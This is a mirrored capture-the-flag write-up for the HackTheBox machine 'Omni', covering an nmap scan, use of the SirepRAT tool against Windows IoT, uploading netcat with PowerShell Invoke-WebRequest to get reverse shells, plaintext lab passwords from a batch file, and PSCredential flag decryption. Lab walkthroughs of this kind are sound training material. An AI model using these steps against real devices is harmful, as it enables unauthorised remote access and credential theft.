Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-09-20 06:11:56 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/HackTheBox/Omni.md
AbdullahRizwan101 91a33260e1
Update Omni.md
2020-11-16 18:41:07 -05:00

5.9 KiB
Raw Blame History

HackTheBox-Omni

NMAP

Host is up (0.21s latency).
Not shown: 65529 filtered ports
PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=11/16%Time=5FB29B69%P=x86_64-pc-linux-gnu%r(
SF:NULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,
SF:"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x
SF:04G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\
SF:xc9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 355.84 seconds

PORT 8080

The site was asking me for credentials , I tried to goolge deafult password for Windows Device Portal

User Name :Administrator password :p@ssw0rd

But these credentials didn't work that I found on google

Then I came to know that this is an IoT box also I found a repository on GitHub which is a script that acts as RAT (Remote Access Trojan)

https://github.com/SafeBreach-Labs/SirepRAT

I tried running commands that were on the repository so basically you want to install hexdump module on python2 because these works with python2

So our RAT is working perfectly!

Now let's try to craft a backdoor to get a reverse shell and start metasploit listener

But this didn't worked

Let's try to upload a netcat binary by hosting on our local machine and using powershell Invoke-WebRequest -Uri $ip -OutFile $filepath

So it did it get transfered on the target box

Looks like this version of netcat is not compatible , I then again tried to upload netcat64.exe and we got a hit

So let's keep our fingers crossed and hope we get a reverse shell

And we got it :D

Here we can see there are 3 drives and we are in C drive where as in D drive we can see the app and administrator folder but we are not able to access them and D drive is formatted correctly so we cannot access it

By using dir /a we can see the hidden folder although we could have used powershell and used ls -la but this still gets our job done so when reading the contents of r.bat we can two users as we suspected and what net user is doing is that changing the password of both the users also it is also deleting that account in a loop

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

So I think we could not switch users as we do in linux atleast I don't know how to do it I tried googling in pasting the commands but didn't work so I assumed that this would be the password for that Windows Device Portal that we saw in the beginning .

So once I got into the application I looked around that what can I do with it and found where I can run system commands

Now to see that which user are we , I tried ruuning whoami it failed but when I ran echo %username% it showed me that I'm Administrator so let's find a way to get a shell from here

Now we already uploaded nc64.exe in C:\Windows\Temp

Now we can't really read the contents of user.txt and root.txt because they are stored as an credential object in powershell which is called PSCredential Object

Now inorder to decrypt user.txt we need to be logged in as ther user in which that file user.txt in and for root.txt we need to be an administrator so we are admintrator let's try to decrypt that flag for now and then we will switch to app user

First we create an object in which that file is stored

$file = Import-Clixml -Path U:\Users\administrator\root.txt

Then if it gives no errors this command ran sucessfully

$file.GetNetworkCredential().password

Then this would use this an object to call a function to grab the password

Now for app user I'm going to quickly log in as him through Windows Device Portal run the netcat binary and caputre the reverse shell

Inorder to do that since there was no logout option on that portal I had to clear all browser's data then logged in with the password that we found for app

I tried ruuning the nc64.exe binary but it was giving accessed denied so there was Public directory in C drive I uploaded the binary there

And we have a shell as app finally

And we got the user flag as well

This link was really helpful for me to decrypt the password or in this case flag https://www.travisgan.com/2015/06/powershell-password-encryption.html